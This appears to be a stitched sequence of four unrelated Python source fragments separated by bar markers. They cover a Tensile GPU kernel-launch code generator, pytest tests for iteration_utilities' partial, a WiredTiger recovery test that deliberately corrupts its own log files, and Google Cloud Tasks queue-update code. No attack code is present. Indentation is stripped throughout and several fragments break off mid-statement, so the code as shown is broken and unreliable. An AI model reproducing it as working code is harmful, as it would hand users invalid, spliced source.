s += "%sdim3(globalWorkSizeBetaOnly[0], globalWorkSizeBetaOnly[1], globalWorkSizeBetaOnly[2]),\n" % (t)
s += "%sdim3(localWorkSizeBetaOnly[0], localWorkSizeBetaOnly[1], localWorkSizeBetaOnly[2]),\n" % (t)
s += "%s0, // groupMemBytes\n" % (t)
s += "%sstream,\n" % (t)
s += "%sworkspace,\n" % (t) if solution["_GlobalAccumulation"] else ("%sdataD,\n" % (t))
s += "%sdataC,\n" % (t)
# strides
if kernel["_GlobalAccumulation"]:
for i in range(0, numStridesC):
s += "%s%s,\n" % (t, WSstrides[i])
else:
for i in range(0, numStridesC):
s += "%s%s,\n" % (t, self.strideList[i])
for i in range(numStridesC, numStridesC*2):
s += "%s%s,\n" % (t, self.strideList[i])
# sizes
for i in range(0, problemType["NumIndicesC"]):
s += "%ssize%s,\n" % (t, self.indexChars[i])
s += ("%sbeta);\n" % (t)) if problemType["UseBeta"] else ("%s0.0f);\n" % (t))
t = t[:-2]
t = t[:-2]
s += "%s} catch (const std::exception& e) {\n" % (t)
t += " "
s += "#ifdef DEBUG\n"
s += "%s std::cerr << e.what() << std::endl;\n" % (t)
s += "#endif\n"
s += "%s return tensileStatusFailure;\n" % (t)
t = t[:-2]
s += "%s}\n" % (t)
########################################
# Enqueue Kernels
########################################
for kernelIdx in range(0, len(kernels)):
kernel = kernels[kernelIdx]
if kernel["KernelLanguage"] == "Source":
kernel["ISA"] = [0, 0, 0] # HIP source kernels needs dummy ISA version
kernelName = self.kernelWriter.getKernelName(kernel)
s += "\n%s/* kernel %u: %s */\n" % (t, kernelIdx, kernelName)
s += "%sunsigned int kernelIdx = %u;\n" % (t, kernelIdx)
if self.language == "OCL":
# set kernel args same for all enqueues
s += "%s// kernel args same for all enqueues\n" % (t)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataD ); tensileStatusCheck(status);\n" % (t, 0)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataC ); tensileStatusCheck(status);\n" % (t, 1)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataA ); tensileStatusCheck(status);\n" % (t, 2)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataB ); tensileStatusCheck(status);\n" % (t, 3)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(%s), &alpha ); tensileStatusCheck(status);\n" % (t, 4, typeName)
s += "%s%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(%s), &beta ); tensileStatusCheck(status);\n" % (t, \
"" if problemType["UseBeta"] else "//", 5, typeName)
argIdx = 6 if problemType["UseBeta"] else 5
for stride in self.strideList:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &%s ); tensileStatusCheck(status);\n" % (t, argIdx, stride)
argIdx += 1
for sizeIdx in range(0, problemType["TotalIndices"]):
if sizeIdx not in [ problemType["Index0"], problemType["Index1"], problemType["IndexUnroll"] ]:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[sizeIdx])
argIdx += 1
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(staggerUIter), &staggerUIter ); tensileStatusCheck(status);\n" % (t, argIdx)
argIdx += 1
s += "%sfor (unsigned int enqueueIdx = 0; enqueueIdx < numEnqueues[%u]; enqueueIdx++) {\n" % (t, kernelIdx)
t += " "
# debug print kernel dimensions
if globalParameters["LibraryPrintDebug"]:
s += "%sprintf(\"%s: g{ %%u, %%u, %%u } l{ %%u, %%u, %%u}\\n\", static_cast<unsigned int>(globalWorkSize[kernelIdx][0]), static_cast<unsigned int>(globalWorkSize[kernelIdx][1]), static_cast<unsigned int>(globalWorkSize[kernelIdx][2]), static_cast<unsigned int>(localWorkSize[0]), static_cast<unsigned int>(localWorkSize[1]), static_cast<unsigned int>(localWorkSize[2]) );\n" % (t, kernelName)
# debug print kernel arguments
# strides
for stride in self.strideList:
s += "%sprintf(\" %s = %%u\\n\", %s);\n" % (t, stride, stride)
# sizes
for i in range(0, problemType["TotalIndices"]):
s += "%sprintf(\" sizes[kernelIdx][enqueueIdx][%u] = %%u\\n\", sizes[kernelIdx][enqueueIdx][%u] );\n" % (t, i, i )
s += "%sprintf(\" staggerUIter == %%u\\n\", staggerUIter );\n" % (t)
s += "%sprintf(\" problemNumGroupTiles0== %%u\\n\", problemNumGroupTiles0 );\n" % (t)
s += "%sprintf(\" problemNumGroupTiles1== %%u\\n\", problemNumGroupTiles1 );\n" % (t)
s += "%sprintf(\" tensor2dSizeC== %%lu\\n\", tensor2dSizeC );\n" % (t)
s += "%sprintf(\" tensor2dSizeA== %%lu\\n\", tensor2dSizeA );\n" % (t)
s += "%sprintf(\" tensor2dSizeB== %%lu\\n\", tensor2dSizeB );\n" % (t)
for idxChar in solution["PackedC0IdxChars"][:-1]:
s += "%sprintf(\" magicNumberSize%s== 0x%%lx, magicShiftSize%s== %%u)\\n\", magicNumberSize%s, magicShiftSize%s);\n" \
% (t, idxChar, idxChar, idxChar, idxChar)
for idxChar in solution["PackedC1IdxChars"][:-1]:
s += "%sprintf(\" magicNumberSize%s== 0x%%x, magicShiftSize%s== %%u)\\n\", magicNumberSize%s, magicShiftSize%s);\n" \
% (t, idxChar, idxChar, idxChar, idxChar)
s += "%sprintf(\" magicNumberProblemNumGroupTiles0==%%u\\n\", magicNumberProblemNumGroupTiles0);\n" % t
########################################
# OpenCL Runtime
########################################
if self.language == "OCL":
# set kernel args different for all enqueues
argIdx = 6 if problemType["UseBeta"] else 5
argIdx += len(self.strideList)
# sizes
for sizeIdx in range(0, problemType["TotalIndices"]):
if sizeIdx in [ problemType["Index0"], problemType["Index1"], problemType["IndexUnroll"] ]:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[sizeIdx])
argIdx += 1
# enqueue
s += "%sstatus = clEnqueueNDRangeKernel(\n" % (t)
t += " "
s += "%sstream,\n" % (t)
s += "%skernels[kernelIdx],\n" % (t)
s += "%sworkDim,\n" % (t)
s += "%sNULL, // globalWorkOffset\n" % (t)
s += "%sglobalWorkSize[kernelIdx],\n" % (t)
s += "%slocalWorkSize,\n" % (t)
if False: # gsu > 1:
s += "%s1,\n" % (t)
s += "%s&kernelEventBetaOnly,\n" % (t)
else:
s += "%snumInputEvents,\n" % (t)
s += "%sinputEvents,\n" % (t)
s += "%soutputEvent );\n" % (t)
s += "%stensileStatusCheck(status);\n" % (t)
t = t[:-2]
s += "%s}\n" % (t)
########################################
# HIP Runtime
########################################
else:
if not globalParameters["PreciseKernelTime"] or kernelLanguage == "Source":
s += "%sif( inputEvents != NULL )\n" % (t)
t += " "
s += "%shipEventRecord(inputEvents[enqueueIdx], stream );\n" % (t)
s += "%stry {\n" % (t)
t += " "
# hip kernel
if kernelLanguage == "Source":
s += "%skernelsLaunched++;\n" % (t)
s += "%shipLaunchKernelGGL(\n" % (t)
t += " "
s += "%sHIP_KERNEL_NAME(%s),\n" % (t, kernelName)
s += "%sdim3(globalWorkSize[kernelIdx][0], globalWorkSize[kernelIdx][1], globalWorkSize[kernelIdx][2]),\n" % (t)
s += "%sdim3(localWorkSize[0], localWorkSize[1], localWorkSize[2]),\n" % (t)
s += "%s0, // groupMemBytes\n" % (t)
s += "%sstream,\n" % (t)
s += ("%sdataD,\n") % (t) if not solution["_GlobalAccumulation"] else ("%sworkspace,\n" % (t))
s += ("%sdataC,\n") % (t) if not solution["_GlobalAccumulation"] else ("%sworkspace,\n" % (t))
s += "%sdataA,\n" % (t)
s += "%sdataB,\n" % (t)
s += "%salpha,\n" % (t)
s += "%s%sbeta,\n" % (t, \
| |
<filename>tests/test_partial.py
# Licensed under Apache License Version 2.0 - see LICENSE
import collections
import copy
import pickle
import sys
import weakref
import pytest
import iteration_utilities
from iteration_utilities import partial
from iteration_utilities._utils import IS_PYPY
import helper_funcs as _hf
from helper_cls import T, toT
# =============================================================================
# These tests are taken from the python tests.
#
# They were changed from unitests to pytest and made py2 and py3 compatible.
# =============================================================================
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, typ, value, tb):
return False
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class MyStr(str):
pass
def test_attributes_unwritable():
p = partial(capture, T(1), T(2), a=T(10), b=T(20))
with pytest.raises(AttributeError):
p.func = map
with pytest.raises(AttributeError):
p.args = (T(1), T(2))
with pytest.raises(AttributeError):
p.keywords = {'a': T(1), 'b': T(2)}
p = partial(hex)
with pytest.raises(TypeError):
del p.__dict__
@_hf.skip_on_pypy_not_investigated_why
def test_recursive_pickle():
with AllowPickle():
f = partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with pytest.raises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
assert f_copy.args[0] is f_copy
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
assert f_copy.keywords['a'] is f_copy
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
def test_repr():
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format(**kwargs),
'b={b!r}, a={a!r}'.format(**kwargs)]
name = 'iteration_utilities.partial'
f = partial(capture)
compare = '{name}({capture!r})'.format(name=name, capture=capture)
assert compare == repr(f)
f = partial(capture, *args)
compare = ('{name}({capture!r}, {args_repr})'
''.format(name=name, capture=capture, args_repr=args_repr))
assert compare == repr(f)
f = partial(capture, **kwargs)
compare = ['{name}({capture!r}, {kwargs_repr})'
''.format(name=name, capture=capture, kwargs_repr=kwargs_repr)
for kwargs_repr in kwargs_reprs]
assert repr(f) in compare
f = partial(capture, *args, **kwargs)
compare = ['{name}({capture!r}, {args_repr}, {kwargs_repr})'
''.format(name=name, capture=capture,
args_repr=args_repr, kwargs_repr=kwargs_repr)
for kwargs_repr in kwargs_reprs]
assert repr(f) in compare
def test_basic_examples():
p = partial(capture, T(1), T(2), a=T(10), b=T(20))
assert callable(p)
assert p(T(3), T(4), b=T(30), c=T(40)) == ((T(1), T(2), T(3), T(4)),
dict(a=T(10), b=T(30), c=T(40)))
p = partial(map, lambda x: x*T(10))
assert list(p([T(1), T(2), T(3), T(4)])) == toT([10, 20, 30, 40])
def test_attributes():
p = partial(capture, T(1), T(2), a=T(10), b=T(20))
# attributes should be readable
assert p.func == capture
assert p.args == (T(1), T(2))
assert p.keywords == dict(a=T(10), b=T(20))
def test_argument_checking():
# at least one argument
with pytest.raises(TypeError):
partial()
# must be callable
with pytest.raises(TypeError):
partial(T(2))
def test_protection_of_callers_dict_argument():
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a': T(3)}
p = partial(func, a=T(5))
assert p(**d) == T(3)
assert d == {'a': T(3)}
p(b=7)
assert d == {'a': T(3)}
def test_kwargs_copy():
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': T(3)}
p = partial(capture, **d)
assert p() == ((), {'a': T(3)})
d['a'] = T(5)
assert p(), ((), {'a': T(3)})
def test_arg_combinations():
# exercise special code paths for zero args in either partial
# object or the caller
p = partial(capture)
assert p() == ((), {})
assert p(T(1), T(2)) == ((T(1), T(2)), {})
p = partial(capture, T(1), T(2))
assert p() == ((T(1), T(2)), {})
assert p(T(3), T(4)) == ((T(1), T(2), T(3), T(4)), {})
def test_kw_combinations():
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = partial(capture)
assert p.keywords == {}
assert p() == ((), {})
assert p(a=T(1)) == ((), {'a': T(1)})
p = partial(capture, a=T(1))
assert p.keywords == {'a': T(1)}
assert p() == ((), {'a': T(1)})
assert p(b=T(2)) == ((), {'a': T(1), 'b': T(2)})
# keyword args in the call override those in the partial object
assert p(a=T(3), b=T(2)) == ((), {'a': T(3), 'b': T(2)})
def test_positional():
# make sure positional arguments are captured correctly
for args in [(), (T(0),), (T(0), T(1)),
(T(0), T(1), T(2)), (T(0), T(1), T(2), T(3))]:
p = partial(capture, *args)
expected = args + (T('x'),)
got, empty = p(T('x'))
assert expected == got and empty == {}
def test_keyword():
# make sure keyword arguments are captured correctly
for a in [T('a'), T(0), T(None), T(3.5)]:
p = partial(capture, a=T(a))
expected = {'a': T(a), 'x': T(None)}
empty, got = p(x=T(None))
assert expected == got and empty == ()
def test_no_side_effects():
# make sure there are no side effects that affect subsequent calls
p = partial(capture, T(0), a=T(1))
args1, kw1 = p(T(1), b=T(2))
assert args1 == (T(0), T(1)) and kw1 == {'a': T(1), 'b': T(2)}
args2, kw2 = p()
assert args2 == (T(0),) and kw2 == {'a': T(1)}
def test_error_propagation():
def f(x, y):
x / y
with pytest.raises(ZeroDivisionError):
partial(f, 1, 0)()
with pytest.raises(ZeroDivisionError):
partial(f, 1)(0)
with pytest.raises(ZeroDivisionError):
partial(f)(1, 0)
with pytest.raises(ZeroDivisionError):
partial(f, y=0)(1)
@_hf.skip_on_pypy_not_investigated_why
def test_weakref():
f = partial(int, base=16)
p = weakref.proxy(f)
assert f.func == p.func
f = None
with pytest.raises(ReferenceError):
p.func
def test_with_bound_and_unbound_methods():
data = list(map(str, range(10)))
join = partial(str.join, '')
assert join(data) == '0123456789'
join = partial(''.join)
assert join(data) == '0123456789'
def test_nested_optimization():
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
assert signature(nested) == signature(flat)
def test_nested_partial_with_attribute():
# see issue 25137
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
assert p2.new_attr == 'spam'
def test_recursive_repr():
name = 'iteration_utilities.partial'
f = partial(capture)
f.__setstate__((f, (), {}, {}))
try:
assert repr(f) == '{}(...)'.format(name)
finally:
f.__setstate__((capture, (), {}, {}))
f = partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
assert repr(f) == '{}({!r}, ...)'.format(name, capture)
finally:
f.__setstate__((capture, (), {}, {}))
f = partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
assert repr(f) == '{}({!r}, a=...)'.format(name, capture)
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle():
with AllowPickle():
f = partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
assert signature(f_copy) == signature(f)
@_hf.skip_on_pypy_not_investigated_why
def test_copy():
f = partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
assert signature(f_copy) == signature(f)
assert f_copy.attr is f.attr
assert f_copy.args is f.args
assert f_copy.keywords is f.keywords
@_hf.skip_on_pypy_not_investigated_why
def test_deepcopy():
f = partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
assert signature(f_copy) == signature(f)
assert f_copy.attr is not f.attr
assert f_copy.args is not f.args
assert f_copy.args[0] is not f.args[0]
assert f_copy.keywords is not f.keywords
assert f_copy.keywords['bar'] is not f.keywords['bar']
def test_setstate():
f = partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
assert signature(f) == (capture, (1,), dict(a=10), dict(attr=[]))
assert f(2, b=20) == ((1, 2), {'a': 10, 'b': 20})
f.__setstate__((capture, (1,), dict(a=10), None))
assert signature(f) == (capture, (1,), dict(a=10), {})
assert f(2, b=20) == ((1, 2), {'a': 10, 'b': 20})
f.__setstate__((capture, (1,), None, None))
# self.assertEqual(signature(f), (capture, (1,), {}, {}))
assert f(2, b=20) == ((1, 2), {'b': 20})
assert f(2) == ((1, 2), {})
assert f() == ((1,), {})
f.__setstate__((capture, (), {}, None))
assert signature(f) == (capture, (), {}, {})
assert f(2, b=20) == ((2,), {'b': 20})
assert f(2) == ((2,), {})
assert f() == ((), {})
def test_setstate_errors():
f = partial(signature)
with pytest.raises(TypeError):
f.__setstate__((capture, (), {}))
with pytest.raises(TypeError):
f.__setstate__((capture, (), {}, {}, None))
with pytest.raises(TypeError):
f.__setstate__([capture, (), {}, None])
with pytest.raises(TypeError):
f.__setstate__((None, (), {}, None))
with pytest.raises(TypeError):
f.__setstate__((capture, None, {}, None))
with pytest.raises(TypeError):
f.__setstate__((capture, [], {}, None))
with pytest.raises(TypeError):
f.__setstate__((capture, (), [], None))
def test_setstate_subclasses():
f = partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
assert s == (capture, (1,), dict(a=10), {})
assert type(s[1]) is tuple
assert type(s[2]) is dict
r = f()
assert r == ((1,), {'a': 10})
assert type(r[0]) is tuple
assert type(r[1]) is dict
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
assert s == (capture, (1,), {}, {})
assert type(s[1]) is tuple
r = f(2)
assert r == ((1, 2), {})
assert type(r[0]) is tuple
def test_setstate_refcount():
# Issue 6083: Reference counting bug
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = partial(object)
with pytest.raises(TypeError):
f.__setstate__(BadSequence())
# =============================================================================
# New | |
#!/usr/bin/env python
#
# Public Domain 2014-2018 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_txn19.py
# Transactions: test recovery with corrupted log files
#
import fnmatch, os, shutil, time
from wtscenario import make_scenarios
from suite_subprocess import suite_subprocess
import wiredtiger, wttest
# This test uses an artificially small log file limit, and creates
# large records so two fit into a log file. This allows us to test
# both the case when corruption happens at the beginning of a log file
# (an even number of records have been created), and when corruption
# happens in the middle of a log file (with an odd number of records).
def corrupt(fname, truncate, offset, writeit):
with open(fname, 'r+') as log:
if offset:
if offset < 0: # Negative offset means seek to the end
log.seek(0, 2)
else:
log.seek(offset)
if truncate:
log.truncate()
if writeit:
log.write(writeit)
class test_txn19(wttest.WiredTigerTestCase, suite_subprocess):
base_config = 'log=(archive=false,enabled,file_max=100K),' + \
'transaction_sync=(enabled,method=none)'
conn_config = base_config
corruption_type = [
('removal', dict(kind='removal', f=lambda fname:
os.remove(fname))),
('truncate', dict(kind='truncate', f=lambda fname:
corrupt(fname, True, 0, None))),
('truncate-middle', dict(kind='truncate-middle', f=lambda fname:
corrupt(fname, True, 1024 * 25, None))),
('zero-begin', dict(kind='zero', f=lambda fname:
corrupt(fname, False, 0, '\0' * 4096))),
('zero-trunc', dict(kind='zero', f=lambda fname:
corrupt(fname, True, 0, '\0' * 4096))),
('zero-end', dict(kind='zero-end', f=lambda fname:
corrupt(fname, False, -1, '\0' * 4096))),
('garbage-begin', dict(kind='garbage-begin', f=lambda fname:
corrupt(fname, False, 0, 'Bad!' * 1024))),
('garbage-middle', dict(kind='garbage-middle', f=lambda fname:
corrupt(fname, False, 1024 * 25, 'Bad!' * 1024))),
('garbage-end', dict(kind='garbage-end', f=lambda fname:
corrupt(fname, False, -1, 'Bad!' * 1024))),
]
# The list comprehension below expands each entry in the integer tuple
# list to a scenario. For example, (3, 4, 2) expands to:
# ('corrupt=[3,4],checkpoint=2', dict(corruptpos=3, corruptpos2=4, chkpt=2))
#
# Each number corresponds to a log file, so for this example, we have
# corruption in log file 3 (using the style of corruption from
# corruption_type), there is a second corruption in log file 4,
# and there is a checkpoint in log file 2. A value of 0 means no
# corruption or checkpoint.
corruption_pos = [
('corrupt=[' + str(x) + ',' + str(y) + '],checkpoint=' + str(z),
dict(corruptpos=x,corruptpos2=y,chkpt=z)) for (x,y,z) in (
(0, 0, 0), (0, 0, 2), (6, 0, 0), (6, 0, 3), (3, 0, 0),
(3, 0, 2), (3, 4, 2), (3, 5, 2), (3, 0, 4))]
nrecords = [('nrecords=10', dict(nrecords=10)),
('nrecords=11', dict(nrecords=11))]
# This function prunes out unnecessary or problematic test cases
# from the list of scenarios.
def includeFunc(name, dictarg):
kind = dictarg['kind']
corruptpos = dictarg['corruptpos']
chkpt = dictarg['chkpt']
# corruptpos == 0 indicates there is no corruption.
# (i.e. corrupt log file 0, which doesn't exist)
# We do want to test the case of no corruption, but we don't
# need to try it against every type of corruption, only one.
if corruptpos == 0:
return kind == 'removal'
# All the other cases are valid
return True
scenarios = make_scenarios(
corruption_type, corruption_pos, nrecords,
include=includeFunc, prune=20, prunelong=1000)
uri = 'table:test_txn19'
create_params = 'key_format=i,value_format=S'
# Return the log file number that contains the given record
# number. In this test, two records fit into each log file, and
# after each even record is written, a new log file is created
# (having no records initially). The last log file is this
# (nrecords/2 + 1), given that we start with log 1.
def record_to_logfile(self, recordnum):
return recordnum / 2 + 1
# Returns the first record number in a log file.
def logfile_to_record(self, logfile):
return (logfile - 1) * 2
# Return true if the log file is corrupted.
# If not corrupted, the log file will produce no errors,
# and all the records originally written should be recovered.
def corrupted(self):
# Corruptpos == 0 means to do no corruption in any log file
if self.corruptpos == 0:
return False
# Adding zeroes to the end of a log file is indistinguishable
# from having a log file that is preallocated that has not been
# totally filled. One might argue that if this does not occur
# in the final log file, it could/should have been truncated.
# At any rate, we consider this particular corruption to be benign.
if self.kind == 'zero-end':
return False
return True
def show_logs(self, homedir, msg):
loglist = []
for i in range(0, 10):
basename = 'WiredTigerLog.000000000' + str(i)
fullname = homedir + os.sep + basename
if os.path.isfile(fullname):
loglist.append(i)
if os.stat(fullname).st_size == 0:
self.tty('LOGS ' + msg + ': ' + str(i) + ' is empty')
self.tty('LOGS ' + msg + ': ' + str(loglist))
def copy_for_crash_restart(self, olddir, newdir):
''' Simulate a crash from olddir and restart in newdir. '''
# with the connection still open, copy files to new directory
shutil.rmtree(newdir, ignore_errors=True)
os.mkdir(newdir)
for fname in os.listdir(olddir):
fullname = os.path.join(olddir, fname)
# Skip lock file on Windows since it is locked
if os.path.isfile(fullname) and \
"WiredTiger.lock" not in fullname and \
"Tmplog" not in fullname and \
"Preplog" not in fullname:
shutil.copy(fullname, newdir)
# Generate a value that is a bit over half the size of the log file.
def valuegen(self, i):
return str(i) + 'A' * (1024 * 60) # ~60K
# Insert a list of keys
def inserts(self, keylist):
c = self.session.open_cursor(self.uri)
for i in keylist:
if self.chkpt > 0 and self.logfile_to_record(self.chkpt) == i:
self.session.checkpoint()
c[i] = self.valuegen(i)
c.close()
def checks(self, expectlist):
c = self.session.open_cursor(self.uri, None, None)
gotlist = []
for key, value in c:
gotlist.append(key)
self.assertEqual(self.valuegen(key), value)
self.assertEqual(expectlist, gotlist)
c.close()
def log_number_to_file_name(self, homedir, n):
self.assertLess(n, 10) # assuming 1 digit
return homedir + os.sep + 'WiredTigerLog.000000000' + str(n)
def corrupt_log(self, homedir):
if not self.corrupted():
return
self.f(self.log_number_to_file_name(homedir, self.corruptpos))
# Corrupt a second log file if needed
if self.corruptpos2 != 0:
self.f(self.log_number_to_file_name(homedir, self.corruptpos2))
def corrupt_last_file(self):
return self.corruptpos == self.record_to_logfile(self.nrecords)
# Corruption past the last written record in a log file can sometimes
# be detected. In our test case, the last log file has zero or one large
# 60K record written into it, but it is presized to 100K. Corruption
# at the end of this file creates a hole, and the corruption starts
# a new log record, where it can be detected as phony. Similarly,
# corruption in the "middle" of the last file (actually the 25K point)
# can be detected if there aren't any of the insert records in the file.
def corrupt_hole_in_last_file(self):
return self.corrupt_last_file() and \
((self.kind == 'garbage-middle' and self.nrecords % 2 == 0) or \
self.kind == 'garbage-end')
# Return true iff the log has been damaged in a way that is not detected
# as a corruption. WiredTiger must be lenient about damage in any log
# file, because a partial log record written just before a crash is in
# most cases indistinguishable | |
in the
format: 'projects/<project>/locations/<location>/queues/<queue>'
"""
def __init__(self, relative_path):
"""Initializes the instance and sets the relative path."""
self._relative_path = relative_path
def RelativeName(self):
"""Gets the string representing the full path for a queue.
This is the only function we are currently using in CT APIs for the
queue_ref resource object.
Returns:
A string representing the full path for a queue in the following
format: 'projects/<project>/locations/<location>/queues/<queue>'
"""
return self._relative_path
queue_yaml = config.parsed
resume_paused_queues = queue_yaml.resume_paused_queues != 'False'
queues_client = tasks_api.queues
queues_not_present_in_yaml = set(all_queues_in_db_dict.keys())
# Just need to create one real instance of queue_ref. After that we can
# create placeholder queue_ref objects based on this instance.
queue_ref = parsers.ParseQueue('a')
queue_ref_stub = queue_ref.RelativeName()[:-1]
# Get the arg values that we need to fill up for each queue using CT APIs
# pylint: disable=protected-access
task_args = flags._PushQueueFlags(release_track=ct_api_version)
# TODO(b/169069379) Remove max_burst_size when/if API is exposed via `gcloud
# tasks queues` CLI invocation.
task_args.append(base.Argument('--max_burst_size', type=int, help=''))
expected_args = []
for task_flag in task_args:
new_arg = task_flag.args[0][2:].replace('-', '_')
expected_args.extend((new_arg, 'clear_{}'.format(new_arg)))
responses = []
if queue_yaml.queue is None:
queue_yaml.queue = []
for queue in queue_yaml.queue:
if queue.name in queues_not_present_in_yaml:
queues_not_present_in_yaml.remove(queue.name)
queue_ref = _PlaceholderQueueRef('{}{}'.format(queue_ref_stub, queue.name))
cur_queue_object = all_queues_in_db_dict.get(queue.name, None)
cloud_task_args = _PopulateCloudTasksArgs(queue, cur_queue_object,
expected_args)
rate_to_set = cloud_task_args.GetValue('max_dispatches_per_second')
if (
resume_paused_queues and
cur_queue_object and
(rate_to_set or queue.mode == constants.PULL_QUEUE) and
cur_queue_object.state in (cur_queue_object.state.DISABLED,
cur_queue_object.state.PAUSED)
):
# Resume queue if it exists, was previously disabled/paused, the new
# rate > 0 and if there is no global flag to skip resuming paused queues.
queues_client.Resume(queue_ref)
elif (
cur_queue_object and
not rate_to_set and
cur_queue_object.state == cur_queue_object.state.RUNNING and
queue.mode in (None, constants.PUSH_QUEUE)
):
queues_client.Pause(queue_ref)
if not _AnyUpdatableFields(cloud_task_args):
# Queue attributes in DB == Queue attributes in YAML
continue
queue_config = parsers.ParseCreateOrUpdateQueueArgs(
cloud_task_args,
# Deliberately hardcoding push queues because we want to be able to
# modify all attributes even for pull queues.
constants.PUSH_QUEUE,
tasks_api.messages,
release_track=ct_api_version)
updated_fields = parsers.GetSpecifiedFieldsMask(
cloud_task_args, constants.PUSH_QUEUE, release_track=ct_api_version)
# TaskTTL and TombstoneTTL are both immutable so we only set them upon
# queue creation. The values set here are as close as possible to the
# default values used with legacy app deploy which used superapps.
if not cur_queue_object:
updated_fields.extend(['taskTtl', 'tombstoneTtl'])
app_engine_routing_override = (
queue_config.appEngineHttpQueue.appEngineRoutingOverride
if queue_config.appEngineHttpQueue is not None else None)
response = queues_client.Patch(
queue_ref,
updated_fields,
retry_config=queue_config.retryConfig,
rate_limits=queue_config.rateLimits,
app_engine_routing_override=app_engine_routing_override,
task_ttl=constants.MAX_TASK_TTL if not cur_queue_object else None,
task_tombstone_ttl=(
constants.MAX_TASK_TOMBSTONE_TTL if not cur_queue_object else None),
queue_type=queue_config.type
)
responses.append(response)
if (
not cur_queue_object and
not rate_to_set and
queue.mode == constants.PUSH_QUEUE
):
# Pause queue if its a new push-queue and rate is zero.
queues_client.Pause(queue_ref)
for queue_name in queues_not_present_in_yaml:
# Skipping 'default' queue to retain backwards compatability with legacy
# behaviour where admin-console-hr would not DISABLE queues named 'default'.
if queue_name == 'default':
continue
queue = all_queues_in_db_dict[queue_name]
if queue.state in (queue.state.PAUSED, queue.state.DISABLED):
continue
queue_ref = _PlaceholderQueueRef('{}{}'.format(queue_ref_stub, queue_name))
queues_client.Pause(queue_ref)
return responses
def _CreateUniqueJobKeyForExistingJob(job, project):
"""Creates a key from the proto job instance's attributes passed as input.
Args:
job: An instance of job fetched from the backend.
project: The base name of the project.
Returns:
A tuple of attributes used as a key to identify this job.
"""
return (
job.schedule,
job.timeZone,
job.appEngineHttpTarget.relativeUri,
job.description,
convertors.CheckAndConvertStringToFloatIfApplicable(
